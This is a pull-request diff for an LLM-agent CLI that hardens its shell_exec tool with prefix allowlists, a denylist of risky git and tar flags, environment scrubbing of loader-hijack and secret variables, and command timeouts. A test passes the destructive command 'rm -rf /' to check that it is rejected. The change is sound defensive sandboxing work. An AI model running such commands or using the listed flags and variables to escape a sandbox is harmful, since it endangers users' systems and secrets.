### PR TITLE
feat: harden shell_exec allowlist (Phase 1) + hardening research

### DIFF
--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -56,7 +56,7 @@ jobs:
           restore-keys: ${{ runner.os }}-cargo-main-audit-
 
       - name: Install cargo-audit
-        run: cargo install cargo-audit --locked
+        run: command -v cargo-audit >/dev/null || cargo install cargo-audit --locked
 
       - name: Run cargo audit
         run: cargo audit

--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:
-        os: [ubuntu-latest, macos-latest]
+        os: [ubuntu-latest, macos-latest, windows-latest]
     steps:
       - uses: actions/checkout@v4
 

--- a/.github/workflows/pr.yml
+++ b/.github/workflows/pr.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:
-        os: [ubuntu-latest, macos-latest]
+        os: [ubuntu-latest, macos-latest, windows-latest]
     steps:
       - uses: actions/checkout@v4
 

--- a/.github/workflows/pr.yml
+++ b/.github/workflows/pr.yml
@@ -56,7 +56,7 @@ jobs:
           restore-keys: ${{ runner.os }}-cargo-audit-
 
       - name: Install cargo-audit
-        run: cargo install cargo-audit --locked
+        run: command -v cargo-audit >/dev/null || cargo install cargo-audit --locked
 
       - name: Run cargo audit
         run: cargo audit

--- a/README.md
+++ b/README.md
@@ -200,6 +200,15 @@ task:
   token_budget: 32000                # Default. Max total tokens across all LLM calls.
   timeout_secs: 300                  # Default. Max wall-clock time in seconds.
   max_iterations: 10                 # Default. Max agent loop iterations.
+  shell_timeout_secs: 120            # Default. Per-command timeout for shell_exec.
+
+  # Optional tool allowlist
+  tool_allowlist:                    # Restrict shell commands to these argv prefixes.
+    - git status                     # "git status" allows that subcommand tree only.
+    - cargo test                     # A bare name (e.g. "git") allows all subcommands.
+  shell_env_passthrough: []          # Default. Extra env vars forwarded to shell_exec
+                                     # commands (exact names only; secret-looking names
+                                     # like *_KEY / *_TOKEN are refused).
 
   # Safety
   ambiguity_policy: fail_closed      # "fail_closed" or "proceed_with_caution".
@@ -207,10 +216,6 @@ task:
                                      # partial results, marked incomplete in logs and SARIF).
                                      # Applies when the agent loop ends without a clean stop
                                      # (context truncated or iteration limit reached).
-
-  # Optional tool allowlist
-  tool_allowlist:                    # Restrict shell commands to these binaries.
-    - git
 
   # Gating rules
   gating:                            # Optional. Evaluated in order.
@@ -242,6 +247,7 @@ task:
 | `CLAUSURA_ON_INCOMPLETE` | `task.on_incomplete` |
 | `CLAUSURA_TOKEN_BUDGET` | `task.token_budget`  |
 | `CLAUSURA_TIMEOUT`      | `task.timeout_secs`  |
+| `CLAUSURA_SHELL_TIMEOUT` | `task.shell_timeout_secs` |
 | `CLAUSURA_MAX_ITERATIONS` | `task.max_iterations` |
 
 Config loading priority: YAML file < CLI flags < environment variables.
@@ -258,6 +264,7 @@ clausura run [OPTIONS]
       --token-budget <N>    Token budget override
       --timeout <SECS>      Timeout override
       --max-iterations <N>  Max agent loop iterations  [default: 10]
+      --shell-timeout <SECS>  Per-command shell_exec timeout  [default: 120]
       --workspace <PATH>    Workspace root            [default: cwd]
       --output <PATH>       SARIF output path          [default: clausura-output.sarif]
       --resume              Resume from last checkpoint
@@ -351,6 +358,10 @@ clausura run
 
 Custom context variables for Generic CI: `CI_REPO`, `CI_PR_NUMBER`, `CI_COMMIT_SHA`, `CI_BRANCH`.
 
+### Supported platforms
+
+Clausura supports Linux and macOS. **Windows is not supported** (a documented non-goal, not "not yet") — on Windows, run Clausura under WSL2 or use the Docker image instead.
+
 ## Architecture
 
 ### Agent loop (reason -> act -> observe)
@@ -401,9 +412,17 @@ Five built-in tools:
 | `list_files`  | List directory contents, with recursive depth, glob filtering, and optional file sizes | Sandboxed to workspace; skips `.clausura/` |
 | `grep`        | Search text patterns across files with literal or regex mode, extension filtering, and binary-skip | Auto-excludes `.git`, `target`, `.clausura`, `node_modules` |
 | `git_diff`    | Run `git diff` with optional base ref or staged  | Operates inside workspace only         |
-| `shell_exec`  | Execute an allowed command (argv form, no shell) | Restricted to `tool_allowlist` entries |
+| `shell_exec`  | Execute an allowed command (argv form, no shell) | Restricted to `tool_allowlist` argv prefixes; dangerous flags denied; scrubbed env |
 
-The `shell_exec` tool is locked by default (empty allowlist = no commands). Explicitly list allowed binaries to enable it. It takes an `argv` array (e.g. `{"argv": ["git", "status"]}`) and executes `argv[0]` directly **without a shell** — shell metacharacters like `;`, `|`, `$()` or `>` are passed through as literal arguments and have no effect, so they cannot be used to bypass the allowlist. The allowlist is matched against `argv[0]` (both the raw value and its basename). Commands run with `current_dir` set to the workspace root, but allowed commands can access paths outside the workspace via arguments.
+The `shell_exec` tool is locked by default (empty allowlist = no commands). Explicitly list allowed commands to enable it. It takes an `argv` array (e.g. `{"argv": ["git", "status"]}`) and executes `argv[0]` directly **without a shell** — shell metacharacters like `;`, `|`, `$()` or `>` are passed through as literal arguments and have no effect, so they cannot be used to bypass the allowlist. Commands run with `current_dir` set to the workspace root, but allowed commands can access paths outside the workspace via arguments.
+
+**Allowlist prefix rules.** Each `tool_allowlist` entry is an argv prefix split on whitespace: an invocation is allowed when its leading tokens equal a rule's tokens. `"git status"` allows `["git", "status"]` and `["git", "status", "--short"]`, but not `["git", "log"]`. A bare program name (e.g. `"git"`) is a length-1 prefix and allows all subcommands of that program (backward compatible). The rule's first token also matches by basename, so `["/usr/bin/git", "status"]` satisfies a `"git status"` rule.
+
+**Dangerous-flag denylist.** On top of the allowlist, known-risky flags are rejected regardless of position (scanning stops at the first `--`, whose following tokens are operands): `git -c`, `git --exec-path`, `git --git-dir`, `git --work-tree`, `tar --checkpoint-action`, `tar --to-command`. Both exact and attached forms are caught (`-c foo`, `-cfoo`, `--git-dir=/x`).
+
+**Environment scrubbing.** Commands run with a minimal, deny-by-default environment: a fixed `PATH` (`/usr/local/bin:/usr/bin:/bin`, plus `$HOME/.cargo/bin` if it exists), `HOME`/`TERM`/`LANG`/`TMPDIR`/`CI` forwarded when present, and safety overrides (`GIT_PAGER=cat`, `PAGER=cat`, `GIT_CONFIG_NOSYSTEM=1`, `GIT_TERMINAL_PROMPT=0`, `GIT_EDITOR=:`, `EDITOR=:`). Everything else — including `CLAUSURA_API_KEY`, `LD_PRELOAD`, `GIT_SSH_COMMAND`, `SSH_AUTH_SOCK`, `BASH_ENV` — is dropped. `shell_env_passthrough` can forward additional variables by exact name; `CLAUSURA_API_KEY` and names ending in `_KEY`, `_TOKEN`, `_SECRET` or `_PASSWORD` are refused with a warning.
+
+**Per-command timeout.** Each command is killed after `shell_timeout_secs` (default 120; override with `--shell-timeout` or `CLAUSURA_SHELL_TIMEOUT`) and the tool returns a `Command timed out after Ns and was killed` result.
 
 Tool outputs are truncated at 32 KB or 1000 lines (whichever comes first) to stay within token budgets; a `[output truncated ...]` marker is appended when this happens — narrow the query or use `read_file`'s `offset`/`limit` to page through large outputs.
 

--- a/crates/clausura-cli/src/commands/run.rs
+++ b/crates/clausura-cli/src/commands/run.rs
@@ -35,6 +35,10 @@ pub struct RunArgs {
     #[arg(long)]
     pub max_iterations: Option<u32>,
 
+    /// Per-command timeout for shell_exec in seconds
+    #[arg(long)]
+    pub shell_timeout: Option<u64>,
+
     /// Workspace root
     #[arg(long)]
     pub workspace: Option<PathBuf>,
@@ -97,6 +101,7 @@ pub async fn execute(args: RunArgs) -> i32 {
         args.token_budget,
         args.timeout,
         args.max_iterations,
+        args.shell_timeout,
         workspace,
         output,
         args.resume,

--- a/crates/clausura-cli/src/main.rs
+++ b/crates/clausura-cli/src/main.rs
@@ -26,7 +26,7 @@ struct Cli {
 #[derive(Subcommand)]
 enum Commands {
     /// Run a Clausura task
-    Run(RunArgs),
+    Run(Box<RunArgs>),
     /// Manage checkpoints
     Snapshot(SnapshotArgs),
 }
@@ -39,7 +39,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
 
     match cli.command {
         Commands::Run(args) => {
-            let exit_code = commands::run::execute(args).await;
+            let exit_code = commands::run::execute(*args).await;
             std::process::exit(exit_code);
         }
         Commands::Snapshot(args) => {

--- a/crates/clausura-core/src/agent.rs
+++ b/crates/clausura-core/src/agent.rs
@@ -373,6 +373,8 @@ mod tests {
             tool_allowlist: vec!["git".into()],
             token_budget: 100000,
             timeout_secs: 60,
+            shell_timeout_secs: 120,
+            shell_env_passthrough: vec![],
             ambiguity_policy: AmbiguityPolicy::FailClosed,
             gating_rules: vec![],
             max_iterations: 10,
@@ -384,7 +386,7 @@ mod tests {
     async fn test_agent_loop_with_tool_calls() {
         let tmp = TempDir::new().unwrap();
         let root = tmp.path().to_path_buf();
-        let tools = default_tools(root.clone(), &[]);
+        let tools = default_tools(root.clone(), &[], 120, &[]);
 
         let mut mock = MockProvider::new("gpt-4o");
         mock.add_response(ChatResponse {
@@ -430,7 +432,7 @@ mod tests {
     #[tokio::test]
     async fn test_agent_loop_halts_on_timeout() {
         let tmp = TempDir::new().unwrap();
-        let tools = default_tools(tmp.path().to_path_buf(), &[]);
+        let tools = default_tools(tmp.path().to_path_buf(), &[], 120, &[]);
 
         let mut mock = MockProvider::new("slow-model");
         mock.add_slow_response(Duration::from_secs(10));
@@ -460,7 +462,7 @@ mod tests {
     #[tokio::test]
     async fn test_agent_loop_truncates_on_budget_exceeded() {
         let (_tmp, root) = setup_agent_env();
-        let tools = default_tools(root.clone(), &[]);
+        let tools = default_tools(root.clone(), &[], 120, &[]);
 
         let mut contract = test_contract();
         contract.token_budget = 10000;
@@ -531,7 +533,7 @@ mod tests {
     #[tokio::test]
     async fn test_agent_loop_breaks_when_cannot_truncate() {
         let (_tmp, root) = setup_agent_env();
-        let tools = default_tools(root.clone(), &[]);
+        let tools = default_tools(root.clone(), &[], 120, &[]);
 
         let mut contract = test_contract();
         contract.token_budget = 1;
@@ -571,7 +573,7 @@ mod tests {
     #[tokio::test]
     async fn test_hint_message_injected_after_truncation() {
         let (_tmp, root) = setup_agent_env();
-        let tools = default_tools(root.clone(), &[]);
+        let tools = default_tools(root.clone(), &[], 120, &[]);
 
         let mut contract = test_contract();
         contract.token_budget = 10000;
@@ -685,7 +687,7 @@ mod tests {
     async fn test_agent_loop_propagates_tool_call_id() {
         let tmp = TempDir::new().unwrap();
         let root = tmp.path().to_path_buf();
-        let tools = default_tools(root.clone(), &[]);
+        let tools = default_tools(root.clone(), &[], 120, &[]);
 
         let mut mock = MockProvider::new("gpt-4o");
         mock.add_response(ChatResponse {
@@ -879,7 +881,7 @@ mod tests {
     async fn test_agent_loop_errors_on_schema_mismatch_instead_of_empty_findings() {
         let tmp = TempDir::new().unwrap();
         let root = tmp.path().to_path_buf();
-        let tools = default_tools(root.clone(), &[]);
+        let tools = default_tools(root.clone(), &[], 120, &[]);
 
         let mut mock = MockProvider::new("gpt-4o");
         mock.add_response(ChatResponse {

--- a/crates/clausura-core/src/config.rs
+++ b/crates/clausura-core/src/config.rs
@@ -72,6 +72,10 @@ struct YamlTaskConfig {
     token_budget: u64,
     #[serde(default = "default_timeout")]
     timeout_secs: u64,
+    #[serde(default = "default_shell_timeout")]
+    shell_timeout_secs: u64,
+    #[serde(default)]
+    shell_env_passthrough: Vec<String>,
     #[serde(default = "default_ambiguity")]
     ambiguity_policy: String,
     #[serde(default)]
@@ -105,6 +109,10 @@ fn default_token_budget() -> u64 {
 
 fn default_timeout() -> u64 {
     300
+}
+
+fn default_shell_timeout() -> u64 {
+    120
 }
 
 fn default_max_iterations() -> u32 {
@@ -218,6 +226,7 @@ impl Config {
         cli_token_budget: Option<u64>,
         cli_timeout: Option<u64>,
         cli_max_iterations: Option<u32>,
+        cli_shell_timeout: Option<u64>,
         workspace: PathBuf,
         output: PathBuf,
         resume: bool,
@@ -247,6 +256,8 @@ impl Config {
                     tool_allowlist: vec![],
                     token_budget: default_token_budget(),
                     timeout_secs: default_timeout(),
+                    shell_timeout_secs: default_shell_timeout(),
+                    shell_env_passthrough: vec![],
                     ambiguity_policy: default_ambiguity(),
                     gating: vec![],
                     max_iterations: default_max_iterations(),
@@ -285,6 +296,12 @@ impl Config {
             .and_then(|v| v.parse().ok())
             .or(cli_max_iterations)
             .unwrap_or(yaml_task.max_iterations);
+
+        let shell_timeout = std::env::var("CLAUSURA_SHELL_TIMEOUT")
+            .ok()
+            .and_then(|v| v.parse().ok())
+            .or(cli_shell_timeout)
+            .unwrap_or(yaml_task.shell_timeout_secs);
 
         // ---- Layer 3: Environment variable overrides ----
         let api_key = std::env::var("CLAUSURA_API_KEY")
@@ -327,6 +344,8 @@ impl Config {
                 tool_allowlist: yaml_task.tool_allowlist,
                 token_budget,
                 timeout_secs: timeout,
+                shell_timeout_secs: shell_timeout,
+                shell_env_passthrough: yaml_task.shell_env_passthrough,
                 ambiguity_policy,
                 gating_rules,
                 max_iterations,
@@ -391,6 +410,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -431,6 +451,7 @@ task:
             Some(32000), // CLI overrides token budget
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -463,6 +484,7 @@ task:
         let config = Config::load(
             Some(file.path()),
             Some("gpt-4o"), // CLI model — env should override this
+            None,
             None,
             None,
             None,
@@ -508,6 +530,7 @@ task:
             Some(16000),
             None,
             Some(120),
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -540,6 +563,7 @@ task:
             std::env::remove_var("CLAUSURA_TIMEOUT");
             std::env::remove_var("CLAUSURA_AMBIGUITY_POLICY");
             std::env::remove_var("CLAUSURA_ON_INCOMPLETE");
+            std::env::remove_var("CLAUSURA_SHELL_TIMEOUT");
         }
     }
 
@@ -549,6 +573,7 @@ task:
         clean_env_vars();
         unsafe { std::env::set_var("CLAUSURA_API_KEY", "sk-test-key") };
         let config = Config::load(
+            None,
             None,
             None,
             None,
@@ -583,6 +608,7 @@ task:
         let file = write_yaml(yaml);
         let config = Config::load(
             Some(file.path()),
+            None,
             None,
             None,
             None,
@@ -629,6 +655,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -665,6 +692,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -694,6 +722,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -714,6 +743,7 @@ task:
             None,
             None,
             Some("sk-cli-key"),
+            None,
             None,
             None,
             None,
@@ -742,6 +772,7 @@ task:
         let file = write_yaml(yaml);
         let result = Config::load(
             Some(file.path()),
+            None,
             None,
             None,
             None,
@@ -778,6 +809,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -802,6 +834,7 @@ task:
         let file = write_yaml(yaml);
         let config = Config::load(
             Some(file.path()),
+            None,
             None,
             None,
             None,
@@ -834,6 +867,7 @@ task:
         let file = write_yaml(yaml);
         let config = Config::load(
             Some(file.path()),
+            None,
             None,
             None,
             None,
@@ -873,6 +907,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -900,6 +935,7 @@ task:
         let file = write_yaml(yaml);
         let config = Config::load(
             Some(file.path()),
+            None,
             None,
             None,
             None,
@@ -940,6 +976,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -959,6 +996,7 @@ task:
             Some("sk-test"),
             Some(16000),
             Some(120),
+            None,
             None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
@@ -1012,6 +1050,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -1057,6 +1096,7 @@ task:
             None,
             None,
             None,
+            None,
             std::env::current_dir().unwrap(),
             "output.sarif".into(),
             false,
@@ -1064,5 +1104,153 @@ task:
         )
         .unwrap();
         assert_eq!(config.config_path, Some(file.path().to_path_buf()));
+    }
+
+    #[test]
+    fn test_shell_config_defaults() {
+        let _guard = ENV_LOCK.lock().unwrap();
+        clean_env_vars();
+        let yaml = r#"
+version: "1"
+task:
+  name: test
+  model: gpt-4o
+  vendor: openai
+  token_budget: 8000
+  timeout_secs: 60
+  ambiguity_policy: fail_closed
+"#;
+        let file = write_yaml(yaml);
+        let config = Config::load(
+            Some(file.path()),
+            None,
+            None,
+            None,
+            None,
+            None,
+            None,
+            None,
+            std::env::current_dir().unwrap(),
+            "output.sarif".into(),
+            false,
+            LogFormat::Json,
+        )
+        .unwrap();
+        assert_eq!(config.task.shell_timeout_secs, 120);
+        assert!(config.task.shell_env_passthrough.is_empty());
+    }
+
+    #[test]
+    fn test_shell_config_from_yaml() {
+        let _guard = ENV_LOCK.lock().unwrap();
+        clean_env_vars();
+        let yaml = r#"
+version: "1"
+task:
+  name: test
+  model: gpt-4o
+  vendor: openai
+  token_budget: 8000
+  timeout_secs: 60
+  shell_timeout_secs: 30
+  shell_env_passthrough:
+    - HTTP_PROXY
+    - CARGO_NET_GIT_FETCH_WITH_CLI
+  ambiguity_policy: fail_closed
+"#;
+        let file = write_yaml(yaml);
+        let config = Config::load(
+            Some(file.path()),
+            None,
+            None,
+            None,
+            None,
+            None,
+            None,
+            None,
+            std::env::current_dir().unwrap(),
+            "output.sarif".into(),
+            false,
+            LogFormat::Json,
+        )
+        .unwrap();
+        assert_eq!(config.task.shell_timeout_secs, 30);
+        assert_eq!(
+            config.task.shell_env_passthrough,
+            vec![
+                "HTTP_PROXY".to_string(),
+                "CARGO_NET_GIT_FETCH_WITH_CLI".to_string()
+            ]
+        );
+    }
+
+    #[test]
+    fn test_shell_timeout_env_overrides_cli_and_yaml() {
+        let _guard = ENV_LOCK.lock().unwrap();
+        clean_env_vars();
+        unsafe { std::env::set_var("CLAUSURA_SHELL_TIMEOUT", "45") };
+        let yaml = r#"
+version: "1"
+task:
+  name: test
+  model: gpt-4o
+  vendor: openai
+  token_budget: 8000
+  timeout_secs: 60
+  shell_timeout_secs: 30
+  ambiguity_policy: fail_closed
+"#;
+        let file = write_yaml(yaml);
+        let config = Config::load(
+            Some(file.path()),
+            None,
+            None,
+            None,
+            None,
+            None,
+            None,
+            Some(90), // CLI flag — env should override this
+            std::env::current_dir().unwrap(),
+            "output.sarif".into(),
+            false,
+            LogFormat::Json,
+        )
+        .unwrap();
+        assert_eq!(config.task.shell_timeout_secs, 45); // env wins over CLI
+        unsafe { std::env::remove_var("CLAUSURA_SHELL_TIMEOUT") };
+    }
+
+    #[test]
+    fn test_shell_timeout_cli_overrides_yaml() {
+        let _guard = ENV_LOCK.lock().unwrap();
+        clean_env_vars();
+        let yaml = r#"
+version: "1"
+task:
+  name: test
+  model: gpt-4o
+  vendor: openai
+  token_budget: 8000
+  timeout_secs: 60
+  shell_timeout_secs: 30
+  ambiguity_policy: fail_closed
+"#;
+        let file = write_yaml(yaml);
+        let config = Config::load(
+            Some(file.path()),
+            None,
+            None,
+            None,
+            None,
+            None,
+            None,
+            Some(90),
+            std::env::current_dir().unwrap(),
+            "output.sarif".into(),
+            false,
+            LogFormat::Json,
+        )
+        .unwrap();
+        assert_eq!(config.task.shell_timeout_secs, 90); // CLI wins over YAML
     }
 }

--- a/crates/clausura-core/src/executor.rs
+++ b/crates/clausura-core/src/executor.rs
@@ -39,7 +39,12 @@ pub async fn execute_task(config: &Config) -> ExecutionReport {
         }
     };
 
-    let tools = default_tools(config.workspace.clone(), &config.task.tool_allowlist);
+    let tools = default_tools(
+        config.workspace.clone(),
+        &config.task.tool_allowlist,
+        config.task.shell_timeout_secs,
+        &config.task.shell_env_passthrough,
+    );
 
     let checkpoint_store = match CheckpointStore::new() {
         Ok(cs) => cs,

--- a/crates/clausura-core/src/tools.rs
+++ b/crates/clausura-core/src/tools.rs
@@ -7,6 +7,7 @@ use std::collections::HashMap;
 use std::io::Read;
 use std::path::{Path, PathBuf};
 use std::sync::Arc;
+use std::time::Duration;
 use tokio::io::{AsyncBufReadExt, BufReader};
 
 // ---------------------------------------------------------------------------
@@ -320,34 +321,160 @@ impl Tool for GitDiffTool {
 pub struct ShellExecTool {
     workspace_root: PathBuf,
     allowlist: Vec<String>,
+    shell_timeout_secs: u64,
+    shell_env_passthrough: Vec<String>,
 }
 
-impl ShellExecTool {
-    pub fn new(workspace_root: PathBuf, allowlist: Vec<String>) -> Self {
-        Self {
-            workspace_root,
-            allowlist,
+/// Per-program dangerous-flag denylist, keyed by the basename of argv[0].
+/// Layered on top of the allowlist: a command must pass both checks.
+const DANGEROUS_FLAGS: &[(&str, &[&str])] = &[
+    ("git", &["-c", "--exec-path", "--git-dir", "--work-tree"]),
+    ("tar", &["--checkpoint-action", "--to-command"]),
+];
+
+/// Environment variable names that must never reach a spawned command.
+fn is_secret_env_name(name: &str) -> bool {
+    name == "CLAUSURA_API_KEY"
+        || ["_KEY", "_TOKEN", "_SECRET", "_PASSWORD"]
+            .iter()
+            .any(|suffix| name.ends_with(suffix))
+}
+
+/// Build the child process environment from scratch (deny-by-default).
+/// Anything not explicitly added here is dropped via `env_clear` — loader
+/// hijack vars (LD_*, DYLD_*), runtime injection vars (BASH_ENV, RUSTFLAGS),
+/// git attack surface (GIT_SSH_COMMAND, GIT_CONFIG_*), SSH_AUTH_SOCK, etc.
+fn build_child_env(
+    passthrough: &[String],
+    lookup: impl Fn(&str) -> Option<String>,
+    home_cargo_bin_exists: bool,
+) -> Vec<(String, String)> {
+    let mut env: Vec<(String, String)> = Vec::new();
+
+    // Fixed PATH (no PATH hijacking); rustup installs cargo under ~/.cargo/bin.
+    let mut path = "/usr/local/bin:/usr/bin:/bin".to_string();
+    if home_cargo_bin_exists {
+        if let Some(home) = lookup("HOME") {
+            path = format!("{}:{}/.cargo/bin", path, home);
+        }
+    }
+    env.push(("PATH".to_string(), path));
+
+    // Minimal keep-list forwarded from the parent environment when present.
+    for name in ["HOME", "TERM", "LANG", "TMPDIR", "CI"] {
+        if let Some(value) = lookup(name) {
+            env.push((name.to_string(), value));
         }
     }
 
-    fn check_allowed(&self, program: &str) -> Result<(), ToolError> {
+    // User-requested passthrough: exact names only; secret-shaped names are
+    // refused (fail closed).
+    for name in passthrough {
+        if is_secret_env_name(name) {
+            tracing::warn!(
+                "shell_env_passthrough: refusing secret-looking variable '{}'",
+                name
+            );
+            continue;
+        }
+        if let Some(value) = lookup(name) {
+            env.push((name.clone(), value));
+        }
+    }
+
+    // Safety overrides we always set ourselves.
+    for (name, value) in [
+        ("GIT_PAGER", "cat"),
+        ("PAGER", "cat"),
+        ("GIT_CONFIG_NOSYSTEM", "1"),
+        ("GIT_TERMINAL_PROMPT", "0"),
+        ("GIT_EDITOR", ":"),
+        ("EDITOR", ":"),
+    ] {
+        env.push((name.to_string(), value.to_string()));
+    }
+
+    env
+}
+
+impl ShellExecTool {
+    pub fn new(
+        workspace_root: PathBuf,
+        allowlist: Vec<String>,
+        shell_timeout_secs: u64,
+        shell_env_passthrough: Vec<String>,
+    ) -> Self {
+        Self {
+            workspace_root,
+            allowlist,
+            shell_timeout_secs,
+            shell_env_passthrough,
+        }
+    }
+
+    /// Allowlist entries are argv prefixes split on whitespace: an invocation
+    /// is allowed when its leading tokens equal a rule's tokens. A bare
+    /// program name is a length-1 prefix. The first token also matches by
+    /// basename, so "/usr/bin/git" satisfies a "git" rule; remaining rule
+    /// tokens compare literally.
+    fn check_allowed(&self, argv: &[String]) -> Result<(), ToolError> {
         if self.allowlist.is_empty() {
             return Err(ToolError::SandboxViolation(
                 "No commands allowed (empty allowlist)".into(),
             ));
         }
-        // Check both the raw token and its basename to support "/usr/bin/git" style
+        let program = &argv[0];
         let basename = Path::new(program)
             .file_name()
             .and_then(|n| n.to_str())
             .unwrap_or(program);
-        let allowed = self.allowlist.contains(&program.to_string())
-            || self.allowlist.contains(&basename.to_string());
+        let allowed = self.allowlist.iter().any(|rule| {
+            let tokens: Vec<&str> = rule.split_whitespace().collect();
+            if tokens.is_empty() || argv.len() < tokens.len() {
+                return false;
+            }
+            if tokens[0] != program && tokens[0] != basename {
+                return false;
+            }
+            argv[1..tokens.len()] == tokens[1..]
+        });
         if !allowed {
             return Err(ToolError::SandboxViolation(format!(
                 "Command not in allowlist: {} (basename: {}). Allowed: {:?}",
                 program, basename, self.allowlist
             )));
+        }
+        Ok(())
+    }
+
+    /// Reject known-dangerous flags for known-risky programs. Scanning stops
+    /// at the first `--` token; tokens after it are operands.
+    fn check_dangerous_flags(&self, argv: &[String]) -> Result<(), ToolError> {
+        let basename = Path::new(&argv[0])
+            .file_name()
+            .and_then(|n| n.to_str())
+            .unwrap_or(&argv[0]);
+        let flags = match DANGEROUS_FLAGS.iter().find(|(name, _)| *name == basename) {
+            Some((_, flags)) => flags,
+            None => return Ok(()),
+        };
+        for token in &argv[1..] {
+            if token == "--" {
+                break;
+            }
+            for flag in *flags {
+                let denied = if flag.starts_with("--") {
+                    token == flag || token.starts_with(&format!("{}=", flag))
+                } else {
+                    token == flag || (token.starts_with(flag) && !token.starts_with("--"))
+                };
+                if denied {
+                    return Err(ToolError::SandboxViolation(format!(
+                        "Flag '{}' is not allowed for '{}' (saw '{}')",
+                        flag, basename, token
+                    )));
+                }
+            }
         }
         Ok(())
     }
@@ -393,14 +520,48 @@ impl Tool for ShellExecTool {
             .split_first()
             .ok_or_else(|| ToolError::ExecutionFailed("'argv' must not be empty".into()))?;
 
-        self.check_allowed(program)?;
+        self.check_allowed(&argv)?;
+        self.check_dangerous_flags(&argv)?;
 
-        let output = tokio::process::Command::new(program)
+        let home_cargo_bin_exists = std::env::var("HOME")
+            .map(|home| Path::new(&home).join(".cargo/bin").is_dir())
+            .unwrap_or(false);
+        let child_env = build_child_env(
+            &self.shell_env_passthrough,
+            |name| std::env::var(name).ok(),
+            home_cargo_bin_exists,
+        );
+
+        let child = tokio::process::Command::new(program)
             .args(rest)
             .current_dir(&self.workspace_root)
-            .output()
-            .await
+            .env_clear()
+            .envs(child_env)
+            .stdout(std::process::Stdio::piped())
+            .stderr(std::process::Stdio::piped())
+            // Ensures the child is killed if the wait future is dropped on timeout.
+            .kill_on_drop(true)
+            .spawn()
             .map_err(|e| ToolError::ExecutionFailed(format!("Shell error: {}", e)))?;
+
+        let output = match tokio::time::timeout(
+            Duration::from_secs(self.shell_timeout_secs),
+            child.wait_with_output(),
+        )
+        .await
+        {
+            Ok(result) => {
+                result.map_err(|e| ToolError::ExecutionFailed(format!("Shell error: {}", e)))?
+            }
+            Err(_) => {
+                // Timed out: dropping the wait future drops the child handle,
+                // and kill_on_drop(true) kills the process.
+                return Ok(format!(
+                    "Command timed out after {}s and was killed",
+                    self.shell_timeout_secs
+                ));
+            }
+        };
 
         let stdout = String::from_utf8_lossy(&output.stdout);
         let stderr = String::from_utf8_lossy(&output.stderr);
@@ -858,13 +1019,20 @@ impl Tool for GrepTool {
 
 /// Create the default set of tools for the given workspace root.
 /// If allowlist is empty, shell_exec is disabled (no commands allowed).
-pub fn default_tools(workspace_root: PathBuf, allowlist: &[String]) -> ToolRegistry {
+pub fn default_tools(
+    workspace_root: PathBuf,
+    allowlist: &[String],
+    shell_timeout_secs: u64,
+    shell_env_passthrough: &[String],
+) -> ToolRegistry {
     let mut registry = ToolRegistry::new();
     registry.register(ReadFileTool::new(workspace_root.clone()));
     registry.register(GitDiffTool::new(workspace_root.clone()));
     registry.register(ShellExecTool::new(
         workspace_root.clone(),
         allowlist.to_vec(),
+        shell_timeout_secs,
+        shell_env_passthrough.to_vec(),
     ));
     registry.register(ListFilesTool::new(workspace_root.clone()));
     registry.register(GrepTool::new(workspace_root));
@@ -1256,7 +1424,7 @@ mod tests {
     async fn test_shell_exec_allowed_command() {
         let (_tmp, root) = setup_workspace();
         let allowlist = vec!["git".into(), "grep".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         let result = tool
             .execute(serde_json::json!({"argv": ["git", "status"]}))
@@ -1268,7 +1436,7 @@ mod tests {
     async fn test_shell_exec_denied_command() {
         let (_tmp, root) = setup_workspace();
         let allowlist = vec!["git".into(), "grep".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         let result = tool
             .execute(serde_json::json!({"argv": ["rm", "-rf", "/"]}))
@@ -1280,7 +1448,7 @@ mod tests {
     async fn test_shell_exec_empty_allowlist() {
         let (_tmp, root) = setup_workspace();
         let allowlist: Vec<String> = vec![];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         let result = tool.execute(serde_json::json!({"argv": ["ls"]})).await;
         assert!(matches!(result, Err(ToolError::SandboxViolation(_))));
@@ -1290,7 +1458,7 @@ mod tests {
     async fn test_shell_exec_missing_arg() {
         let (_tmp, root) = setup_workspace();
         let allowlist = vec!["git".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         let result = tool.execute(serde_json::json!({})).await;
         assert!(matches!(result, Err(ToolError::ExecutionFailed(_))));
@@ -1300,7 +1468,7 @@ mod tests {
     async fn test_shell_exec_empty_argv() {
         let (_tmp, root) = setup_workspace();
         let allowlist = vec!["git".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         let result = tool.execute(serde_json::json!({"argv": []})).await;
         assert!(matches!(result, Err(ToolError::ExecutionFailed(_))));
